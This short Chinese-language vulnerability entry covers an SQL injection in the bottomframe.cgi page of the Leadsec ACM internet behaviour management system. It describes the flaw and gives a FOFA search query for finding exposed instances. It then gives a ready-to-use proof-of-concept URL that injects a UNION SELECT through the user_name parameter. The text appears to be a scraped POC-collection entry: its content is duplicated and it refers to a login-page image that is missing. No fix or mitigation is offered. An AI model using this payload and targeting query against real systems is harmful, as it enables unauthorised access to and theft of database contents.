网御ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞
漏洞描述
网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信息
漏洞复现
fofa语法:app="网御星云-上网行为管理系统"
登录页面如下:
POC:/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
网御 ACM上网行为管理系统 bottomframe.cgi 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库敏感信息
fofa语法:app="网御星云-上网行为管理系统"
登录页面如下:
POC:/bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
